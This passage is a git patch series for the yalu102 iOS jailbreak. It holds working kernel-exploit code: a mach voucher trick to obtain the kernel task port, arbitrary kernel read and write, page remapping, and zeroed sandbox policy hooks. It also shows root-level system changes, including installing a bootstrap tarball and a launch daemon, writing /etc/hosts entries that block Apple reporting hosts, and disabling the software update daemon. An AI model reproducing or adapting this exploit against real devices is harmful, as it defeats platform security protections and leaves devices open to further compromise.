(sbops_end - sbops)/(PSZ); + + int ctr = 0; + for (int i = 0; i < nopag; i++) { + RemapPage(((sbops + i*(PSZ)) & (~PMK))); } + WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_file_check_mmap)), 0); WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); WriteAnywhere64(NewPointer(sbops+offsetof(struct mac_policy_ops, mpo_vnode_check_rename)), 0); From a0443c653acb4d178b8fa206e6242bc6f5dfccff Mon Sep 17 00:00:00 2001 From: qwertyoruiop Date: Sun, 29 Jan 2017 16:55:24 +0100 Subject: [PATCH 18/34] hit that blunt --- yalu102/jailbreak.m | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 625ec3d..04b81be 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -502,7 +502,8 @@ void jailbreak(void) }\ }\ if (fail == 0) {\ - RemapPage_(x);\ +RemapPage_(x);\ +RemapPage_(x+PSZ);\ remappage[remapcnt++] = (x & (~PMK));\ }\ } @@ -531,7 +532,11 @@ void jailbreak(void) RemapPage(kernvers+whole_base-4); WriteAnywhere32(NewPointer(kernvers+whole_base-4), 1); - copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */ + + RemapPage(release+whole_base); + if (NewPointer(release+whole_base) == (NewPointer(release+whole_base+11) - 11)) { + copyout(NewPointer(release+whole_base), "MarijuanARM", 11); /* marijuanarm */ + } uint64_t memcmp_got = find_amfi_memcmpstub(); uint64_t ret1 = find_ret_0(); From 6f3743db6c49fbf18f23903eef7344de15972dea Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:19:09 +0100 Subject: [PATCH 19/34] Add printing uname result to log --- yalu102/YAKernelOffsets.m | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/yalu102/YAKernelOffsets.m b/yalu102/YAKernelOffsets.m index dc430cb..95dd969 100644 --- a/yalu102/YAKernelOffsets.m +++ b/yalu102/YAKernelOffsets.m @@ -13,6 +13,11 @@ @implementation YAKernelOffsets + (instancetype)offsetsForCurrentDevice { struct utsname u = { 0 }; uname(&u); + printf("sysname: %s\n", u.sysname); + printf("nodename: %s\n", u.nodename); + printf("release: %s\n", u.release); + printf("version: %s\n", u.version); + printf("machine: %s\n", u.machine); return [self offsetsForKernelVersion:[NSString stringWithUTF8String:u.version]]; } From 3890496af207367277edd9b88cb986a1043589f5 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:19:13 +0100 Subject: [PATCH 20/34] Cosmetics --- yalu102/ViewController.h | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/yalu102/ViewController.h b/yalu102/ViewController.h index 80fe105..1cee99c 100644 --- a/yalu102/ViewController.h +++ b/yalu102/ViewController.h @@ -8,10 +8,10 @@ #import -@interface ViewController : UIViewController -{ - IBOutlet UIButton* dope; +@interface ViewController : UIViewController { + IBOutlet UIButton *dope; } + - (IBAction)yolo:(id)sender; @end From 0f056d28868438e093e9121926dff32b87d5826c Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:19:27 +0100 Subject: [PATCH 21/34] Add printing jailbreak() config to log --- yalu102/jailbreak.m | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 04b81be..6390051 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -90,6 +90,13 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { void jailbreak(void) { + NSLog(@"jailbreaking using:"); + NSLog(@"tfp0 = %x", tfp0); + NSLog(@"kernbase = %llx", kernbase); + NSLog(@"slide = %llx", slide); + NSLog(@"allprocs_offset = %llx", allprocs_offset); + NSLog(@"rootvnode_offset = %llx", rootvnode_offset); + io_iterator_t iterator; IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); io_object_t servicex = IOIteratorNext(iterator); From 7c50bdf4b7bc0829c81378e94331905815ab42d7 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:19:42 +0100 Subject: [PATCH 22/34] Add pte_stuff.h to Xcode project --- yalu102.xcodeproj/project.pbxproj | 2 ++ 1 file changed, 2 insertions(+) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index f41c659..480d597 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -39,6 +39,7 @@ A70DFAAE1E3E3B8900769FE9 /* YAExploitTFP0.m */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = sourcecode.c.objc; path = YAExploitTFP0.m; sourceTree = ""; }; A72023711E3CFBCA00FADBFF /* IOKit.framework */ = {isa = PBXFileReference; lastKnownFileType = wrapper.framework; name = IOKit.framework; path = System/Library/Frameworks/IOKit.framework; sourceTree = SDKROOT; }; A72023751E3CFE2E00FADBFF /* yalu102.xcconfig */ = {isa = PBXFileReference; lastKnownFileType = text.xcconfig; path = yalu102.xcconfig; sourceTree = ""; }; + A766FD8B1E3E499A002A75CE /* pte_stuff.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pte_stuff.h; sourceTree = ""; }; EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = patchfinder64.h; sourceTree = ""; }; EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */ = {isa = PBXFileReference; lastKnownFileType = "compiled.mach-o.objfile"; path = patchfinder64.o; sourceTree = ""; }; EA1A3BA61E398E33009CA025 /* 0.reload.plist */ = {isa = PBXFileReference; fileEncoding = 4; lastKnownFileType = text.plist.xml; path = 0.reload.plist; sourceTree = ""; }; @@ -128,6 +129,7 @@ A70DFAAC1E3E389100769FE9 /* mach_vm.h */, EA1A3B9B1E38BBDB009CA025 /* patchfinder64.h */, EA1A3B9C1E391C4F009CA025 /* patchfinder64.o */, + A766FD8B1E3E499A002A75CE /* pte_stuff.h */, EA9900EC1E1E9F060056FEBD /* ViewController.h */, EA9900ED1E1E9F060056FEBD /* ViewController.m */, A70DFA9C1E3D314F00769FE9 /* jailbreak.h */, From 75a17baab0ce483d4d40dd1777202157d1c51384 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:41:19 +0100 Subject: [PATCH 23/34] Cosmetics --- yalu102/jailbreak.m | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index 6390051..b7486b8 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -633,8 +633,7 @@ void jailbreak(void) uint64_t sbops_end = sbops + sizeof(struct mac_policy_ops) + PMK; uint64_t nopag = (sbops_end - sbops)/(PSZ); - - int ctr = 0; + for (int i = 0; i < nopag; i++) { RemapPage(((sbops + i*(PSZ)) & (~PMK))); } From 6e1f1c71e9ab5c7224b3fdd1723d00508dd781f0 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 17:42:14 +0100 Subject: [PATCH 24/34] Fix vm_address_t size regression --- yalu102/mach_vm.h | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yalu102/mach_vm.h b/yalu102/mach_vm.h index 301a23a..14fcd99 100644 --- a/yalu102/mach_vm.h +++ b/yalu102/mach_vm.h @@ -3,6 +3,9 @@ #include +// evil hackfix: makes vm_address_t 64-bit +#define vm_address_t mach_vm_address_t + kern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize); kern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt); kern_return_t mach_vm_protect(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, boolean_t set_maximum, vm_prot_t new_protection); From 89f35a1492c56e1fe694d04450c6ad2614b93c68 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 18:16:50 +0100 Subject: [PATCH 25/34] Create softwareupdated launchd plist backup --- yalu102/jailbreak.m | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index b7486b8..e29de8f 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -796,7 +796,8 @@ void jailbreak(void) chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); } - //unlink("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist"); + rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", + "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } } chmod("/private", 0777); From 35176c7c2bf2a9b8e554e7e13e415b1eceb921eb Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 18:17:01 +0100 Subject: [PATCH 26/34] =?UTF-8?q?Don=E2=80=99t=20change=20mode=20of=20Pref?= =?UTF-8?q?erences=20directory?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- yalu102/jailbreak.m | 3 +++ 1 file changed, 3 insertions(+) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index e29de8f..ebfa1ab 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -800,11 +800,14 @@ void jailbreak(void) "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } } + + /* chmod("/private", 0777); chmod("/private/var", 0777); chmod("/private/var/mobile", 0777); chmod("/private/var/mobile/Library", 0777); chmod("/private/var/mobile/Library/Preferences", 0777); + */ system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); From cc0d834be6565e633d1c3ae68e2e9138649c708b Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Sun, 29 Jan 2017 23:54:35 +0100 Subject: [PATCH 27/34] Cut down compiler warning noise --- yalu102.xcodeproj/project.pbxproj | 2 + yalu102/jailbreak.m | 208 ++++++++++++++---------------- 2 files changed, 101 insertions(+), 109 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index 480d597..6a6dc82 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -381,6 +381,7 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; + GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", @@ -402,6 +403,7 @@ ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; CLANG_ENABLE_OBJC_ARC = NO; + GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", "$(PROJECT_DIR)/yalu102/include", diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index a1fb15f..0781580 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -31,13 +31,6 @@ uint64_t allprocs_offset; uint64_t rootvnode_offset; -io_connect_t funcconn=0; - -uint32_t FuncAnywhere32(uint64_t addr, uint64_t x0, uint64_t x1, uint64_t x2) -{ - return IOConnectTrap4(funcconn, 0, x1, x2, x0, addr); -} - void copyin(void* to, uint64_t from, size_t size) { mach_vm_size_t outsize = size; size_t szt = size; @@ -56,7 +49,6 @@ void copyin(void* to, uint64_t from, size_t size) { if (size > 0x1000) { size = 0x1000; } - } } @@ -88,8 +80,7 @@ uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) { #import "pte_stuff.h" -void jailbreak(void) -{ +void jailbreak(void) { NSLog(@"jailbreaking using:"); NSLog(@"tfp0 = %x", tfp0); NSLog(@"kernbase = %llx", kernbase); @@ -97,13 +88,6 @@ void jailbreak(void) NSLog(@"allprocs_offset = %llx", allprocs_offset); NSLog(@"rootvnode_offset = %llx", rootvnode_offset); - io_iterator_t iterator; - IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOSurfaceRoot"), &iterator); - io_object_t servicex = IOIteratorNext(iterator); - funcconn = 0; - IOServiceOpen(servicex, mach_task_self(), 0, &funcconn); - assert(funcconn); - uint64_t bsd_task=0; uint64_t launchd_task = 0; { @@ -146,41 +130,42 @@ void jailbreak(void) checkvad(); - vm_address_t vmd = 0; + mach_vm_offset_t vmd = 0; _kernelrpc_mach_vm_allocate_trap(mach_task_self(), &vmd, 0x4000, VM_FLAGS_ANYWHERE); copyin((void*)vmd, kernbase, 0x4000); - struct mach_header_64* vmk = vmd; + struct mach_header_64* vmk = (struct mach_header_64*)vmd; uint64_t max = 0; uint64_t min = -1; - struct load_command* lc = vmk+1; + struct load_command* lc = (struct load_command*)(vmk + 1); for (int k=0; k < vmk->ncmds; k++) { - if (lc->cmd == LC_SEGMENT_64) { - struct segment_command_64* sg = lc; + struct segment_command_64* sg = (struct segment_command_64*)lc; NSLog(@"seg: %s", sg->segname); if (sg->vmaddr < min) { min = sg->vmaddr; } if (sg->vmaddr + sg->vmsize > max) { - max = sg->vmaddr+sg->vmsize; + max = sg->vmaddr + sg->vmsize; } } - lc = ((char*)lc) + lc->cmdsize; + lc = (struct load_command*)(((char*)lc) + lc->cmdsize); } + + size_t kernsize = (size_t)(max - min); - NSLog(@"%llx - %llx", min, max); + NSLog(@"%llx - %llx = %zx", min, max, kernsize); - char* kdump = malloc(max-min); + char* kdump = malloc(kernsize); - for (int k=0; k < (max-min)/0x4000; k++) { + for (int k=0; k < kernsize/0x4000; k++) { copyin(kdump+k*0x4000, min+k*0x4000, 0x4000); } - NSLog(@"%llx", kdump); + NSLog(@"%zx", (uintptr_t)kdump); uint64_t kerndumpsize = 0; uint64_t gadget_base = 0; uint64_t gadget_size = 0; @@ -215,10 +200,10 @@ void jailbreak(void) kerndumpsize += seg->vmsize; } else if (load_cmd->cmd == LC_UNIXTHREAD) { struct { - unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ - unsigned long cmdsize; /* total size of this command */ + unsigned long cmd; /* LC_THREAD or LC_UNIXTHREAD */ + unsigned long cmdsize; /* total size of this command */ unsigned long flavor; /* flavor of thread state */ - unsigned long count; /* count of longs in thread state */ + unsigned long count; /* count of longs in thread state */ struct { __uint64_t __x[29]; /* General purpose registers x0-x28 */ __uint64_t __fp; /* Frame pointer x29 */ @@ -228,7 +213,7 @@ void jailbreak(void) __uint32_t __cpsr; /* Current program status register */ __uint32_t __pad; /* Same size for 32-bit or 64-bit clients */ } state; - } * thr = load_cmd; + } * thr = (void*)load_cmd; entryp = thr->state.__pc; } @@ -246,9 +231,15 @@ void jailbreak(void) entryp += slide; uint64_t rvbar = entryp & (~0xFFF); - uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x40, text_exec_base, 1); + uint64_t cpul = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), + rvbar - gadget_base + 0x40, + text_exec_base, + 1); - uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), rvbar-gadget_base+0x50, text_exec_base, 20); + uint64_t optr = find_register_value((uint32_t*)get_data_for_mode(0, SearchTextExec), + rvbar - gadget_base + 0x50, + text_exec_base, + 20); if (uref) { optr = ReadAnywhere64(optr) - gPhysBase + gVirtBase; } @@ -261,9 +252,8 @@ void jailbreak(void) NSLog(@"pmap: %llx", pmap_store); level1_table = ReadAnywhere64(ReadAnywhere64(pmap_store)); - - - + + uint64_t shellcode = physalloc(0x4000); /* @@ -455,7 +445,7 @@ void jailbreak(void) */ int cpacr_idx = 0; - uint32_t* opps = gadget_base - min + kdump; + uint32_t* opps = (uint32_t*)(gadget_base - min + kdump); while (1) { if (opps[cpacr_idx] == 0xd5181040) { @@ -745,82 +735,82 @@ void jailbreak(void) } { - char path[256]; - uint32_t size = sizeof(path); - _NSGetExecutablePath(path, &size); - char* pt = realpath(path, 0); - - { - __block pid_t pd = 0; - NSString* execpath = [[NSString stringWithUTF8String:pt] stringByDeletingLastPathComponent]; + NSBundle *resBundle = [NSBundle mainBundle]; + pid_t tmp_pid; + const char** tmp_args; + + int installedFd = open("/.installed_yaluX", O_RDONLY); + + if (installedFd == -1) { + NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil]; + NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; + + unlink("/bin/tar"); + unlink("/bin/launchctl"); + + copyfile([tarPath UTF8String], "/bin/tar", 0, 0); + chmod("/bin/tar", 0755); + chown("/bin/tar", 0, 0); + + tmp_args = (const char*[]){ + "/bin/tar", + "--preserve-permissions", + "--no-overwrite-dir", + "-C /", + "-xvf", + [bootstrapTarPath UTF8String], + NULL + }; + posix_spawn(&tmp_pid, "/bin/tar", NULL, NULL, (char**)tmp_args, NULL); + waitpid(tmp_pid, 0, 0); + NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; + copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, 0); + chmod("/bin/launchctl", 0755); + chown("/bin/launchctl", 0, 0); - int f = open("/.installed_yaluX", O_RDONLY); - - if (f == -1) { - NSString* tar = [execpath stringByAppendingPathComponent:@"tar"]; - NSString* bootstrap = [execpath stringByAppendingPathComponent:@"bootstrap.tar"]; - const char* jl = [tar UTF8String]; - - unlink("/bin/tar"); - unlink("/bin/launchctl"); - - copyfile(jl, "/bin/tar", 0, COPYFILE_ALL); - chmod("/bin/tar", 0755); - jl="/bin/tar"; // - - chdir("/"); - - posix_spawn(&pd, jl, 0, 0, (char**)&(const char*[]){jl, "--preserve-permissions", "--no-overwrite-dir", "-xvf", [bootstrap UTF8String], NULL}, NULL); - NSLog(@"pid = %x", pd); - waitpid(pd, 0, 0); - - - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"launchctl"]; - jl = [jlaunchctl UTF8String]; - - copyfile(jl, "/bin/launchctl", 0, COPYFILE_ALL); - chmod("/bin/launchctl", 0755); - - open("/.installed_yaluX", O_RDWR|O_CREAT); - open("/.cydia_no_stash",O_RDWR|O_CREAT); - - - system("echo '127.0.0.1 iphonesubmissions.apple.com' >> /etc/hosts"); - system("echo '127.0.0.1 radarsubmissions.apple.com' >> /etc/hosts"); - - system("/usr/bin/uicache"); - - system("killall -SIGSTOP cfprefsd"); - NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; - - [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; - - [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; - system("killall -9 cfprefsd"); - - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"reload"]; - const char* jl = [jlaunchctl UTF8String]; - unlink("/usr/libexec/reload"); - copyfile(jl, "/usr/libexec/reload", 0, COPYFILE_ALL); - chmod("/usr/libexec/reload", 0755); - chown("/usr/libexec/reload", 0, 0); - - } - { - NSString* jlaunchctl = [execpath stringByAppendingPathComponent:@"0.reload.plist"]; - const char* jl = [jlaunchctl UTF8String]; - unlink("/Library/LaunchDaemons/0.reload.plist"); - copyfile(jl, "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); - chmod("/Library/LaunchDaemons/0.reload.plist", 0644); - chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); + close(open("/.installed_yaluX", O_RDWR|O_CREAT)); + close(open("/.cydia_no_stash", O_RDWR|O_CREAT)); + + int hostsFd = open("/etc/hosts", O_RDWR|O_APPEND); + if (hostsFd != -1) { + const char *s; + s = "127.0.0.1 iphonesubmissions.apple.com\n" + "127.0.0.1 radarsubmissions.apple.com\n"; + write(hostsFd, s, strlen(s)); + close(hostsFd); } - rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", - "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); + system("/usr/bin/uicache"); + + system("killall -SIGSTOP cfprefsd"); + NSMutableDictionary* md = [[NSMutableDictionary alloc] initWithContentsOfFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist"]; + [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; + [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; + system("killall -9 cfprefsd"); + } + else { + close(installedFd); + } + + { + NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil]; + unlink("/usr/libexec/reload"); + copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, 0); + chmod("/usr/libexec/reload", 0755); + chown("/usr/libexec/reload", 0, 0); } + + { + NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil]; + unlink("/Library/LaunchDaemons/0.reload.plist"); + copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, 0); + chmod("/Library/LaunchDaemons/0.reload.plist", 0644); + chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); + } + + rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", + "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } /* From fd768e933876073da5a1c63fade14e1d84964765 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 00:49:33 +0100 Subject: [PATCH 28/34] Cosmetics --- yalu102/jailbreak.m | 24 ++++++++---------------- 1 file changed, 8 insertions(+), 16 deletions(-) diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index a910048..a98a03e 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -810,7 +810,7 @@ void jailbreak(void) { unlink("/bin/tar"); unlink("/bin/launchctl"); - copyfile([tarPath UTF8String], "/bin/tar", 0, 0); + copyfile([tarPath UTF8String], "/bin/tar", 0, COPYFILE_ALL); chmod("/bin/tar", 0755); chown("/bin/tar", 0, 0); @@ -818,7 +818,7 @@ void jailbreak(void) { "/bin/tar", "--preserve-permissions", "--no-overwrite-dir", - "-C /", + "-C", "/", "-xvf", [bootstrapTarPath UTF8String], NULL @@ -827,7 +827,7 @@ void jailbreak(void) { waitpid(tmp_pid, 0, 0); NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; - copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, 0); + copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); chmod("/bin/launchctl", 0755); chown("/bin/launchctl", 0, 0); @@ -850,6 +850,9 @@ void jailbreak(void) { [md setObject:[NSNumber numberWithBool:YES] forKey:@"SBShowNonDefaultSystemApps"]; [md writeToFile:@"/var/mobile/Library/Preferences/com.apple.springboard.plist" atomically:YES]; system("killall -9 cfprefsd"); + + rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", + "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } else { close(installedFd); @@ -858,7 +861,7 @@ void jailbreak(void) { { NSString* reloadPath = [resBundle pathForResource:@"reload" ofType:nil]; unlink("/usr/libexec/reload"); - copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, 0); + copyfile([reloadPath UTF8String], "/usr/libexec/reload", 0, COPYFILE_ALL); chmod("/usr/libexec/reload", 0755); chown("/usr/libexec/reload", 0, 0); } @@ -866,22 +869,11 @@ void jailbreak(void) { { NSString* reloadPlistPath = [resBundle pathForResource:@"0.reload.plist" ofType:nil]; unlink("/Library/LaunchDaemons/0.reload.plist"); - copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, 0); + copyfile([reloadPlistPath UTF8String], "/Library/LaunchDaemons/0.reload.plist", 0, COPYFILE_ALL); chmod("/Library/LaunchDaemons/0.reload.plist", 0644); chown("/Library/LaunchDaemons/0.reload.plist", 0, 0); } - - rename("/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist", - "/System/Library/LaunchDaemons/com.apple.mobile.softwareupdated.plist.bak"); } - - /* - chmod("/private", 0777); - chmod("/private/var", 0777); - chmod("/private/var/mobile", 0777); - chmod("/private/var/mobile/Library", 0777); - chmod("/private/var/mobile/Library/Preferences", 0777); - */ system("(echo 'really jailbroken'; /bin/launchctl load /Library/LaunchDaemons/0.reload.plist)&"); From 698b0049b5f5e12bea4a227677969a49169eb9a6 Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 02:09:12 +0100 Subject: [PATCH 29/34] Cosmetics --- yalu102/YAExploitTFP0.m | 9 +++------ yalu102/jailbreak.m | 6 ++---- 2 files changed, 5 insertions(+), 10 deletions(-) diff --git a/yalu102/YAExploitTFP0.m b/yalu102/YAExploitTFP0.m index 712b0fb..c8dfc0d 100644 --- a/yalu102/YAExploitTFP0.m +++ b/yalu102/YAExploitTFP0.m @@ -87,8 +87,6 @@ #define IKOT_IOKIT_CONNECT 29 #define IKOT_CLOCK 25 -char dt[128]; - @implementation YAExploitTFP0 + (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets @@ -97,14 +95,13 @@ + (mach_port_t)getTaskForPid0WithOffsets:(YAKernelOffsets *)offsets { const uint64_t procoff = offsets->procoff; - mach_port_t vch = 0; - mach_voucher_attr_recipe_data_t *data = malloc(sizeof(mach_voucher_attr_recipe_data_t) + 0x10); data->content_size = 0; - data->key=MACH_VOUCHER_ATTR_KEY_BANK; - data->command=610; + data->key = MACH_VOUCHER_ATTR_KEY_BANK; + data->command = 610; data->previous_voucher=MACH_PORT_NULL; + mach_port_t vch = 0; kern_return_t lol = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)data, sizeof(mach_voucher_attr_recipe_data_t), diff --git a/yalu102/jailbreak.m b/yalu102/jailbreak.m index a98a03e..72b057d 100644 --- a/yalu102/jailbreak.m +++ b/yalu102/jailbreak.m @@ -805,15 +805,12 @@ void jailbreak(void) { if (installedFd == -1) { NSString* tarPath = [resBundle pathForResource:@"tar" ofType:nil]; - NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; - unlink("/bin/tar"); - unlink("/bin/launchctl"); - copyfile([tarPath UTF8String], "/bin/tar", 0, COPYFILE_ALL); chmod("/bin/tar", 0755); chown("/bin/tar", 0, 0); + NSString* bootstrapTarPath = [resBundle pathForResource:@"bootstrap.tar" ofType:nil]; tmp_args = (const char*[]){ "/bin/tar", "--preserve-permissions", @@ -827,6 +824,7 @@ void jailbreak(void) { waitpid(tmp_pid, 0, 0); NSString* launchctlPath = [resBundle pathForResource:@"launchctl" ofType:nil]; + unlink("/bin/launchctl"); copyfile([launchctlPath UTF8String], "/bin/launchctl", 0, COPYFILE_ALL); chmod("/bin/launchctl", 0755); chown("/bin/launchctl", 0, 0); From a097cdd38bafc10485dd2d955178afe4383d06be Mon Sep 17 00:00:00 2001 From: Aaahh Ahh Date: Sun, 29 Jan 2017 21:39:24 -0500 Subject: [PATCH 30/34] Travis Support --- .travis.yml | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 .travis.yml diff --git a/.travis.yml b/.travis.yml new file mode 100644 index 0000000..58b8265 --- /dev/null +++ b/.travis.yml @@ -0,0 +1,4 @@ +osx_image: xcode8.1 +language: objective-c +script: +- set -o pipefail && xcodebuild build -project yalu102.xcodeproj -xcconfig yalu102.xcconfig -configuration Debug CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO | xcpretty From a9ee05a100f4d2e83dc51f2e87ba39612a8d018d Mon Sep 17 00:00:00 2001 From: Oliver Kuckertz Date: Mon, 30 Jan 2017 15:18:31 +0100 Subject: [PATCH 31/34] Enable ARC --- yalu102.xcodeproj/project.pbxproj | 2 -- yalu102/ViewController.h | 4 +--- yalu102/ViewController.m | 15 ++++++++------- 3 files changed, 9 insertions(+), 12 deletions(-) diff --git a/yalu102.xcodeproj/project.pbxproj b/yalu102.xcodeproj/project.pbxproj index a774a7f..7cbec97 100644 --- a/yalu102.xcodeproj/project.pbxproj +++ b/yalu102.xcodeproj/project.pbxproj @@ -384,7 +384,6 @@ buildSettings = { ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; - CLANG_ENABLE_OBJC_ARC = NO; GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", @@ -406,7 +405,6 @@ buildSettings = { ARCHS = armv7; ASSETCATALOG_COMPILER_APPICON_NAME = AppIcon; - CLANG_ENABLE_OBJC_ARC = NO; GCC_WARN_ABOUT_DEPRECATED_FUNCTIONS = NO; HEADER_SEARCH_PATHS = ( "$(inherited)", diff --git a/yalu102/ViewController.h b/yalu102/ViewController.h index 1cee99c..d7c93d5 100644 --- a/yalu102/ViewController.h +++ b/yalu102/ViewController.h @@ -8,9 +8,7 @@ #import -@interface ViewController : UIViewController { - IBOutlet UIButton *dope; -} +@interface ViewController : UIViewController - (IBAction)yolo:(id)sender; diff --git a/yalu102/ViewController.m b/yalu102/ViewController.m index fc3dba8..8440a41 100644 --- a/yalu102/ViewController.m +++ b/yalu102/ViewController.m @@ -15,6 +15,7 @@ @interface ViewController () @property (nonatomic, strong) YAKernelOffsets *offsets; +@property 